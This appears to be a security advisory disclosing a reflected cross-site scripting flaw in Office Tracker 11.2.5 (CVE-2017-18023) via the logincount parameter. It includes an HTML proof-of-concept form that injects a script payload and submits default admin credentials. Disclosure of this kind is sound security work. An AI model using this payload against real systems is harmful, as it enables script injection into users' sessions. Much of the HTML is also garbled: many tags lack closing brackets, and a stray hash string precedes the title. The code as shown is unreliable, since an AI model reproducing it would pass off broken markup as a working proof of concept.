Office Tracker version 11.2.5 suffers from a cross site scripting vulnerability.
a458952c5d53a047d2ebccfe52183690# Title: Office Tracker 11.2.5 - XSS
# Author: Nassim Asrir
# Contact: [email protected]
# Vendor: https://www.officetracker.com/
# CVE: CVE-2017-18023
# Description
Office Tracker 11.2.5 has XSS via the
logincount parameter to the /otweb/OTPClientLogin URI.
------------------------------------------
# Details
The value of the logincount request parameter is copied into the HTML
document as plain text between tags. The payload
chfkh<scriptalert(1)</scriptp9glb was submitted in the logincount
parameter. This input was echoed unmodified in the application's
response.
------------------------------------------
# Vulnerability Type
Cross Site Scripting (XSS)
------------------------------------------
# Attack Type
Remote
------------------------------------------
# POC
<html>
<body
<scripthistory.pushState('', '', '/')</script
<form action="http://server/otweb/OTPClientLogin" method="POST"
<input type="hidden" name="logincount" value="0chfkh<script>alert(1)</script>p9glb" /
<input type="hidden" name="lastname" value="MorisonM" /
<input type="hidden" name="timezone" value="" /
<input type="hidden" name="uid" value="" /
<input type="hidden" name="phone" value="false" /
<input type="hidden" name="login" value="admin" /
<input type="hidden" name="password" value="admin" /
<input type="hidden" name="submitbtn" value="Login" /
<input type="submit" value="Submit request" /
</form
</body
</html
------------------------------------------